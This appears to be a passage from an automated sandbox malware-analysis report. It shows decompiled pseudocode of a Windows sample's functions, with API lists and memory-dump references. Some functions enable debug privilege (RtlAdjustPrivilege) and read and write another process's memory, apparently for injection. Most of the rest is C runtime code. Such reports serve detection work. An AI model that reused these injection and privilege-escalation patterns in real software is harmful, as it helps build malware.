    						_v12 = _t22;
    						if(_t22 != 0) {
    							 *((intOrPtr*)(__esi + 4)) = _t22;
    							_t26 = E00F61149( &_v12,  &_v28,  *(__esi + 2) & 0x0000ffff); // executed
    							_t28 = _t26;
    						}
    					}
    				}
    				return _t28;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F61F38
    • GetProcAddress.KERNEL32(00000000), ref: 00F61F3F
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 79%
    			E00F620B7(char _a4, intOrPtr _a8) {
    				long _t7;
    				void* _t8;
    				intOrPtr _t12;
    
    				if(_a4 > 1) {
    					 *0xf6bfb8 = E00F61FEC( *((intOrPtr*)(_a8 + 4)));
    				}
    				__imp__RtlGetNtVersionNumbers(0xf6cfd0, 0xf6cfcc, 0xf6cfd4);
    				 *0xf6cfd4 =  *0xf6cfd4 & 0x00003fff;
    				_t7 = RtlAdjustPrivilege(0x14, 1, 0,  &_a4); // executed
    				if(_t7 >= 0) {
    					 *0xf6cec0 = 0xf69d1c;
    					if( *0xf6cfd0 >= 6) {
    						 *0xf6cec0 = 0xf69d30; // executed
    					}
    					E00F632E4();
    					_t12 =  *0xf6cec0; // 0x0
    					 *((intOrPtr*)(_t12 + 4))();
    				}
    				_t8 =  *0xf6bfb8; // 0xffffffff
    				if(_t8 != 0xffffffff) {
    					CloseHandle(_t8);
    				}
    				return 0;
    			}

    APIs
    • RtlGetNtVersionNumbers.NTDLL(00F6CFD0,00F6CFCC,00F6CFD4), ref: 00F620E0
    • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,00000001), ref: 00F620FA
    • CloseHandle.KERNEL32(FFFFFFFF), ref: 00F62139
      • Part of subcall function 00F61FEC: GetProcessHeap.KERNEL32 ref: 00F62013
      • Part of subcall function 00F61FEC: HeapAlloc.KERNEL32(00000000), ref: 00F6201A
      • Part of subcall function 00F61FEC: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00F6202F
      • Part of subcall function 00F61FEC: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00F62041
      • Part of subcall function 00F61FEC: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00F62065
      • Part of subcall function 00F61FEC: GetModuleHandleW.KERNEL32(kernel32,GetLastError), ref: 00F6207C
      • Part of subcall function 00F61FEC: GetProcAddress.KERNEL32(00000000), ref: 00F62083
      • Part of subcall function 00F61FEC: Sleep.KERNEL32(00000BB8), ref: 00F62093
      • Part of subcall function 00F61FEC: WaitNamedPipeW.KERNEL32(?,00000BB8), ref: 00F6209F
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 90%
    			E00F65329(signed int __eax, void* __ebx, signed int** _a4, intOrPtr* _a8) {
    				signed int _v8;
    				intOrPtr* _v24;
    				intOrPtr _v28;
    				signed int _t34;
    				signed int _t36;
    				signed int _t39;
    				void* _t40;
    				signed int _t41;
    				void* _t42;
    				signed short* _t44;
    				signed int** _t45;
    				void* _t46;
    				signed int _t47;
    				signed int* _t55;
    				signed int _t56;
    				signed int _t57;
    				signed int _t58;
    				signed int _t60;
    				signed int _t69;
    				unsigned int _t71;
    				signed int _t73;
    				signed int _t75;
    				intOrPtr* _t77;
    				void* _t80;
    				signed short* _t82;
    				signed int _t83;
    				signed int* _t85;
    				void* _t90;
    
    				_t46 = __ebx;
    				_t82 =  *0xf6bfc4; // 0x0
    				_t73 = 0;
    				if(_t82 != 0) {
    					while(1) {
    						_t34 =  *_t82 & 0x0000ffff;
    						if(_t34 != 0) {
    							if(_t34 != 0x3d) {
    								_t73 = _t73 + 1;
    							}
    						} else {
    							break;
    						}
    						_t82 = _t82 + 2 + E00F674FA(_t82) * 2;
    					}
    					_push(_t46);
    					_t36 = E00F661C9(_t73 + 1, 4);
    					_t47 = _t36;
    					 *0xf6c018 = _t47;
    					if(_t47 != 0) {
    						_t83 =  *0xf6bfc4; // 0x0
    						while( *_t83 != 0) {
    							_t4 = E00F674FA(_t83) + 1; // 0x1
    							_t75 = _t4;
    							if( *_t83 == 0x3d) {
    								L13:
    								_t83 = _t83 + _t75 * 2;
    								continue;
    							} else {
    								_t40 = E00F661C9(_t75, 2); // executed
    								_pop(_t55);
    								 *_t47 = _t40;
    								if(_t40 == 0) {
    									_t41 = E00F6614A( *0xf6c018);
    									 *0xf6c018 =  *0xf6c018 & 0x00000000;
    									_t39 = _t41 | 0xffffffff;
    									L16:
    									goto L17;
    								} else {
    									_t42 = E00F67515(_t40, _t75, _t83);
    									_t90 = _t90 + 0xc;
    									if(_t42 != 0) {
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										_t44 = E00F64BDF();
    										asm("int3");
    										_push(_t55);
    										_push(_t83);
    										_t69 = 0;
    										_push(_t75);
    										_t77 = _v24;
    										 *_t47 = 0;
    										_t85 = _t55;
    										 *_t77 = 1;
    										if(_v28 != 0) {
    											_a4 =  &(_a4[1]);
    											 *_a4 = _t85;
    										}
    										do {
    											if( *_t44 != 0x22) {
    												 *_t47 =  *_t47 + 1;
    												if(_t85 != 0) {
    													 *_t85 =  *_t44;
    													_t85 =  &(_t85[0]);
    												}
    												_t56 =  *_t44 & 0x0000ffff;
    												_t44 =  &(_t44[1]);
    												if(_t56 == 0) {
    													_t44 = _t44 - 2;
    												} else {
    													goto L28;
    												}
    											} else {
    												_t77 = _a8;
    												_t44 =  &(_t44[1]);
    												_t69 = 0 | _t69 == 0x00000000;
    												_t56 = 0x22;
    												goto L28;
    											}
    											L33:
    											_v8 = _v8 & 0x00000000;
    											L34:
    											while( *_t44 != 0) {
    												while(1) {
    													_t57 =  *_t44 & 0x0000ffff;
    													if(_t57 != 0x20 && _t57 != 9) {
    														break;
    													}
    													_t44 =  &(_t44[1]);
    												}
    												if( *_t44 != 0) {
    													if(_a4 != 0) {
    														_a4 =  &(_a4[1]);
    														 *_a4 = _t85;
    													}
    													 *_t77 =  *_t77 + 1;
    													while(1) {
    														_t80 = 1;
    														_t71 = 0;
    														L45:
    														while( *_t44 == 0x5c) {
    															_t44 =  &(_t44[1]);
    															_t71 = _t71 + 1;
    														}
    														if( *_t44 == 0x22) {
    															if((_t71 & 0x00000001) == 0) {
    																if(_v8 == 0 || _t44[1] != 0x22) {
    																	_t80 = 0;
    																	_v8 = 0 | _v8 == 0x00000000;
    																} else {
    																	_t44 =  &(_t44[1]);
    																}
    															}
    															_t71 = _t71 >> 1;
    														}
    														while(_t71 != 0) {
    															_t71 = _t71 - 1;
    															if(_t85 != 0) {
    																_t60 = 0x5c;
    																 *_t85 = _t60;
    																_t85 =  &(_t85[0]);
    															}
    															 *_t47 =  *_t47 + 1;
    														}
    														_t58 =  *_t44 & 0x0000ffff;
    														if(_t58 != 0 && (_v8 != _t71 || _t58 != 0x20 && _t58 != 9)) {
    															if(_t80 != 0) {
    																if(_t85 != 0) {
    																	 *_t85 = _t58;
    																	_t85 =  &(_t85[0]);
    																}
    																 *_t47 =  *_t47 + 1;
    															}
    															_t44 =  &(_t44[1]);
    															_t80 = 1;
    															_t71 = 0;
    															goto L45;
    														}
    														if(_t85 != 0) {
    															 *_t85 = 0;
    															_t85 =  &(_t85[0]);
    														}
    														 *_t47 =  *_t47 + 1;
    														_t77 = _a8;
    														goto L34;
    													}
    												}
    												break;
    											}
    											_t45 = _a4;
    											if(_t45 != 0) {
    												 *_t45 = 0;
    											}
    											 *_t77 =  *_t77 + 1;
    											return _t45;
    											goto L72;
    											L28:
    										} while (_t69 != 0 || _t56 != 0x20 && _t56 != 9);
    										if(_t85 != 0) {
    											 *((short*)(_t85 - 2)) = 0;
    										}
    										goto L33;
    									} else {
    										_t47 = _t47 + 4;
    										goto L13;
    									}
    								}
    							}
    							goto L72;
    						}
    						E00F6614A( *0xf6bfc4);
    						 *0xf6bfc4 =  *0xf6bfc4 & 0x00000000;
    						 *_t47 =  *_t47 & 0x00000000;
    						 *0xf6cea0 = 1;
    						_t39 = 0;
    						goto L16;
    					} else {
    						_t39 = _t36 | 0xffffffff;
    						L17:
    						goto L18;
    					}
    				} else {
    					_t39 = __eax | 0xffffffff;
    					L18:
    					return _t39;
    				}
    				L72:
    			}

    0x00f65329
    0x00f6532c
    0x00f65333
    0x00f65337
    0x00f65353
    0x00f65353
    0x00f65359
    0x00f65345
    0x00f65347
    0x00f65347
    0x00000000
    0x00000000
    0x00000000
    0x00f6534f
    0x00f6534f
    0x00f6535b
    0x00f65360
    0x00f65365
    0x00f65369
    0x00f65371
    0x00f65378
    0x00f653b5
    0x00f6538b
    0x00f6538b
    0x00f6538e
    0x00f653b2
    0x00f653b2
    0x00000000
    0x00f65390
    0x00f65393
    0x00f65399
    0x00f6539a
    0x00f6539e
    0x00f653e7
    0x00f653ec
    0x00f653f3
    0x00f653dc
    0x00000000
    0x00f653a0
    0x00f653a3
    0x00f653a8
    0x00f653ad
    0x00f653fa
    0x00f653fb
    0x00f653fc
    0x00f653fd
    0x00f653fe
    0x00f653ff
    0x00f65404
    0x00f6540a
    0x00f6540b
    0x00f6540c
    0x00f6540e
    0x00f6540f
    0x00f65412
    0x00f65414
    0x00f65416
    0x00f6541f
    0x00f65424
    0x00f65428
    0x00f65428
    0x00f6542a
    0x00f6542e
    0x00f65444
    0x00f65448
    0x00f6544d
    0x00f65450
    0x00f65450
    0x00f65453
    0x00f65456
    0x00f6545c
    0x00f65499
    0x00000000
    0x00000000
    0x00000000
    0x00f65430
    0x00f65430
    0x00f6543c
    0x00f6543f
    0x00f65441
    0x00000000
    0x00f65441
    0x00f65478
    0x00f65478
    0x00000000
    0x00f6547c
    0x00f65487
    0x00f65487
    0x00f6548d
    0x00000000
    0x00000000
    0x00f65494
    0x00f65494
    0x00f654a1
    0x00f654aa
    0x00f654af
    0x00f654b3
    0x00f654b3
    0x00f654b5
    0x00f654b7
    0x00f654b9
    0x00f654ba
    0x00000000
    0x00f654c2
    0x00f654be
    0x00f654c1
    0x00f654c1
    0x00f654cc
    0x00f654d1
    0x00f654d7
    0x00f654e7
    0x00f654ef
    0x00f654e0
    0x00f654e0
    0x00f654e0
    0x00f654d7
    0x00f654f2
    0x00f654f2
    0x00f65506
    0x00f654f6
    0x00f654f9
    0x00f654fd
    0x00f654fe
    0x00f65501
    0x00f65501
    0x00f65504
    0x00f65504
    0x00f6550a
    0x00f65510
    0x00f65523
    0x00f65527
    0x00f65529
    0x00f6552c
    0x00f6552c
    0x00f6552f
    0x00f6552f
    0x00f65531
    0x00f654b9
    0x00f654ba
    0x00000000
    0x00f654bc
    0x00f65538
    0x00f6553c
    0x00f6553f
    0x00f6553f
    0x00f65542
    0x00f65544
    0x00000000
    0x00f65544
    0x00f654b7
    0x00000000
    0x00f654a1
    0x00f6554c
    0x00f65551
    0x00f65553
    0x00f65553
    0x00f65555
    0x00f6555a
    0x00000000
    0x00f6545e
    0x00f6545e
    0x00f65470
    0x00f65474
    0x00f65474
    0x00000000
    0x00f653af
    0x00f653af
    0x00000000
    0x00f653af
    0x00f653ad
    0x00f6539e
    0x00000000
    0x00f6538e
    0x00f653c1
    0x00f653c6
    0x00f653cd
    0x00f653d0
    0x00f653da
    0x00000000
    0x00f65373
    0x00f65373
    0x00f653dd
    0x00000000
    0x00f653dd
    0x00f65339
    0x00f65339
    0x00f653de
    0x00f653e0
    0x00f653e0
    0x00000000

    APIs
    • _wcslen.LIBCMT ref: 00F65349
      • Part of subcall function 00F661C9: Sleep.KERNEL32(00000000), ref: 00F661F1
    • _wcslen.LIBCMT ref: 00F65381
      • Part of subcall function 00F6614A: HeapFree.KERNEL32(00000000,00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66160
      • Part of subcall function 00F6614A: GetLastError.KERNEL32(00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66172
      • Part of subcall function 00F64BDF: GetCurrentProcess.KERNEL32(C0000417), ref: 00F64BF5
      • Part of subcall function 00F64BDF: TerminateProcess.KERNEL32(00000000), ref: 00F64BFC
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 23%
    			E00F64D92(void* __edi, void* __esi, intOrPtr _a4) {
    				void* _t4;
    				intOrPtr* _t10;
    				void* _t18;
    				intOrPtr* _t19;
    				void* _t21;
    
    				_t21 = __esi;
    				_t18 = __edi;
    				_t24 =  *0xf6ceb0;
    				if( *0xf6ceb0 != 0 && E00F67190(_t24, 0xf6ceb0) != 0) {
    					_t2 =  *0xf6ceb0(_a4);
    				}
    				E00F670CE(_t2);
    				_t4 = E00F64D6E(0xf6816c, 0xf68180);
    				_t26 = _t4;
    				if(_t4 == 0) {
    					_push(_t21);
    					_push(_t18);
    					E00F670B7(_t26, E00F658CC);
    					_t19 = 0xf68164;
    					if(0xf68164 >= 0xf68168) {
    						L8:
    						_t30 =  *0xf6ceb4;
    						if( *0xf6ceb4 != 0 && E00F67190(_t30, 0xf6ceb4) != 0) {
    							 *0xf6ceb4(0, 2, 0);
    						}
    						return 0;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						_t10 =  *_t19;
    						if(_t10 != 0) {
    							 *_t10();
    						}
    						_t19 = _t19 + 4;
    					} while (_t19 < 0xf68168);
    					goto L8;
    				}
    				return _t4;
    			}

    0x00f64d92
    0x00f64d92
    0x00f64d97
    0x00f64d9e
    0x00f64db2
    0x00f64db8
    0x00f64db9
    0x00f64dc8
    0x00f64dcf
    0x00f64dd1
    0x00f64dd3
    0x00f64dd4
    0x00f64dda
    0x00f64dea
    0x00f64dee
    0x00f64dff
    0x00f64dff
    0x00f64e08
    0x00f64e1f
    0x00f64e1f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00f64df0
    0x00f64df0
    0x00f64df0
    0x00f64df4
    0x00f64df6
    0x00f64df6
    0x00f64df8
    0x00f64dfb
    0x00000000
    0x00f64df0
    0x00f64e28

    APIs
      • Part of subcall function 00F670CE: EncodePointer.KERNEL32(00F67C5A,?,?,00F64DBE), ref: 00F670DA
    • __initterm_e.LIBCMT ref: 00F64DC8
      • Part of subcall function 00F67190: __FindPESection.LIBCMT ref: 00F671EB
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 37%
    			E00F6704A() {
    				signed int* _t1;
    				void* _t3;
    				signed int* _t6;
    
    				_t1 = E00F661C9(0x20, 4);
    				_t6 = _t1;
    				__imp__EncodePointer(_t6);
    				 *0xf6cea8 = _t1;
    				 *0xf6cea4 = _t1;
    				if(_t6 != 0) {
    					 *_t6 =  *_t6 & 0x00000000;
    					return 0;
    				} else {
    					_t3 = 0x18;
    					return _t3;
    				}
    			}

    0x00f67051
    0x00f67058
    0x00f6705b
    0x00f67061
    0x00f67066
    0x00f6706d
    0x00f67074
    0x00f6707a
    0x00f6706f
    0x00f67071
    0x00f67073
    0x00f67073

    APIs
      • Part of subcall function 00F661C9: Sleep.KERNEL32(00000000), ref: 00F661F1
    • EncodePointer.KERNEL32(00000000), ref: 00F6705B
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    APIs
    • EncodePointer.KERNEL32(00F67C5A,?,?,00F64DBE), ref: 00F670DA
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 100%
    			E00F658F2() {
    				void* _t3;
    
    				_t3 = HeapCreate(0, 0x1000, 0); // executed
    				 *0xf6c86c = _t3;
    				return 0 | _t3 != 0x00000000;
    			}

    0x00f658fb
    0x00f65908
    0x00f6590f

    APIs
    • HeapCreate.KERNEL32(00000000,00001000,00000000,00F63A7A,00F69DC8,00000014), ref: 00F658FB
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 100%
    			E00F64D11(int _a4) {
    
    				E00F64CE6(_a4);
    				ExitProcess(_a4);
    			}

    0x00f64d19
    0x00f64d22

    APIs
      • Part of subcall function 00F64CE6: GetModuleHandleW.KERNEL32(mscoree.dll,?,00F64D1E,00000000,?,00F6780B,000000FF,0000001E,00000001,00000000,00000000,?,00F66195,00000000,00000001,00000000), ref: 00F64CF0
      • Part of subcall function 00F64CE6: GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00F64D1E,00000000,?,00F6780B,000000FF,0000001E,00000001,00000000,00000000,?,00F66195,00000000,00000001), ref: 00F64D00
    • ExitProcess.KERNEL32 ref: 00F64D22
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    APIs
    • EncodePointer.KERNEL32(Function_00006CF0,00F64D69,00000000,00000000,00000000,00000000,00000000,00000000,0000A4A8,00F64957,?,00F63A8B,00F69DC8,00000014), ref: 00F66D2E
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    APIs
    • EncodePointer.KERNEL32(00000000,00F67272,00F6C038,00000314,00000000,?,?,?,?,?,00F65134,00F6C038,Microsoft Visual C++ Runtime Library,00012010), ref: 00F64595
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 86%
    			E00F679A2(signed int _a4, signed int _a8, long _a12) {
    				void* _t10;
    				long _t11;
    				long _t12;
    				signed int _t13;
    				signed int _t17;
    				long _t19;
    				long _t24;
    
    				_t17 = _a4;
    				if(_t17 == 0) {
    					L3:
    					_t24 = _t17 * _a8;
    					__eflags = _t24;
    					if(_t24 == 0) {
    						_t24 = _t24 + 1;
    						__eflags = _t24;
    					}
    					goto L5;
    					L6:
    					_t10 = HeapAlloc( *0xf6c86c, 8, _t24); // executed
    					__eflags = 0;
    					if(0 == 0) {
    						goto L7;
    					}
    					L14:
    					return _t10;
    					goto L15;
    					L7:
    					__eflags =  *0xf6cd2c;
    					if( *0xf6cd2c == 0) {
    						_t19 = _a12;
    						__eflags = _t19;
    						if(_t19 != 0) {
    							 *_t19 = 0xc;
    						}
    					} else {
    						_t11 = E00F66F6C(_t10, _t24);
    						__eflags = _t11;
    						if(_t11 != 0) {
    							L5:
    							_t10 = 0;
    							__eflags = _t24 - 0xffffffe0;
    							if(_t24 > 0xffffffe0) {
    								goto L7;
    							} else {
    								goto L6;
    							}
    						} else {
    							_t12 = _a12;
    							__eflags = _t12;
    							if(_t12 != 0) {
    								 *_t12 = 0xc;
    							}
    							_t10 = 0;
    						}
    					}
    					goto L14;
    				} else {
    					_t13 = 0xffffffe0;
    					_t27 = _t13 / _t17 - _a8;
    					if(_t13 / _t17 >= _a8) {
    						goto L3;
    					} else {
    						 *((intOrPtr*)(E00F64C83(_t27))) = 0xc;
    						return 0;
    					}
    				}
    				L15:
    			}

    0x00f679a7
    0x00f679ac
    0x00f679c9
    0x00f679ce
    0x00f679d0
    0x00f679d2
    0x00f679d4
    0x00f679d4
    0x00f679d4
    0x00000000
    0x00f679dc
    0x00f679e5
    0x00f679eb
    0x00f679ed
    0x00000000
    0x00000000
    0x00f67a21
    0x00f67a23
    0x00000000
    0x00f679ef
    0x00f679ef
    0x00f679f6
    0x00f67a14
    0x00f67a17
    0x00f67a19
    0x00f67a1b
    0x00f67a1b
    0x00f679f8
    0x00f679f9
    0x00f679ff
    0x00f67a01
    0x00f679d5
    0x00f679d5
    0x00f679d7
    0x00f679da
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00f67a03
    0x00f67a03
    0x00f67a06
    0x00f67a08
    0x00f67a0a
    0x00f67a0a
    0x00f67a10
    0x00f67a10
    0x00f67a01
    0x00000000
    0x00f679ae
    0x00f679b2
    0x00f679b5
    0x00f679b8
    0x00000000
    0x00f679ba
    0x00f679bf
    0x00f679c8
    0x00f679c8
    0x00f679b8
    0x00000000

    APIs
    • HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00F661DF,?,00000000,00000000,00000000,00000000,?,00F646F5,00000001,00000214), ref: 00F679E5
      • Part of subcall function 00F66F6C: DecodePointer.KERNEL32(?,00F679FE,00000000,00000000,?,00F661DF,?,00000000,00000000,00000000,00000000,?,00F646F5,00000001,00000214), ref: 00F66F77
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 100%
    			E00F661C9(signed int _a4, signed int _a8) {
    				void* _t4;
    				long _t6;
    				void* _t7;
    				long _t8;
    				void* _t9;
    				void* _t12;
    				void* _t13;
    
    				_t8 = 0;
    				while(1) {
    					_t4 = E00F679A2(_a4, _a8, 0); // executed
    					_t7 = _t4;
    					_t9 = _t9 + 0xc;
    					if(_t7 != 0) {
    						break;
    					}
    					_t12 =  *0xf6c9c0 - _t4; // 0x0
    					if(_t12 > 0) {
    						Sleep(_t8);
    						_t3 = _t8 + 0x3e8; // 0x3e8
    						_t6 = _t3;
    						_t13 = _t6 -  *0xf6c9c0; // 0x0
    						if(_t13 > 0) {
    							_t6 = _t6 | 0xffffffff;
    						}
    						_t8 = _t6;
    						if(_t6 != 0xffffffff) {
    							continue;
    						}
    					}
    					break;
    				}
    				return _t7;
    			}

    0x00f661d0
    0x00f661d2
    0x00f661da
    0x00f661df
    0x00f661e1
    0x00f661e6
    0x00000000
    0x00000000
    0x00f661e8
    0x00f661ee
    0x00f661f1
    0x00f661f7
    0x00f661f7
    0x00f661fd
    0x00f66203
    0x00f66205
    0x00f66205
    0x00f66208
    0x00f6620d
    0x00000000
    0x00000000
    0x00f6620d
    0x00000000
    0x00f661ee
    0x00f66214

    APIs
      • Part of subcall function 00F679A2: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00F661DF,?,00000000,00000000,00000000,00000000,?,00F646F5,00000001,00000214), ref: 00F679E5
    • Sleep.KERNEL32(00000000), ref: 00F661F1
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 84%
    			E00F61CFA(void** __esi) {
    				void* _v8;
    				void* _t9;
    				void* _t10;
    
    				_push(_t12);
    				_t9 = E00F61DF3(__esi,  &_v8); // executed
    				if(_t9 == 0) {
    					 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
    					return _t9;
    				} else {
    					_t10 = _v8;
    					 *(__esi + 0xc) =  *(_t10 + 8);
    					return LocalFree(_t10);
    				}
    			}

    0x00f61cfe
    0x00f61d05
    0x00f61d0d
    0x00f61d21
    0x00f61d26
    0x00f61d0f
    0x00f61d0f
    0x00f61d16
    0x00f61d20
    0x00f61d20

    APIs
      • Part of subcall function 00F61DF3: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018,?,?,00000000), ref: 00F61E63
      • Part of subcall function 00F61DF3: GetProcAddress.KERNEL32(00000000), ref: 00F61E6C
      • Part of subcall function 00F61DF3: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000109), ref: 00F61EB0
      • Part of subcall function 00F61DF3: GetProcAddress.KERNEL32(00000000), ref: 00F61EB3
      • Part of subcall function 00F61DF3: LocalFree.KERNEL32(?), ref: 00F61EEB
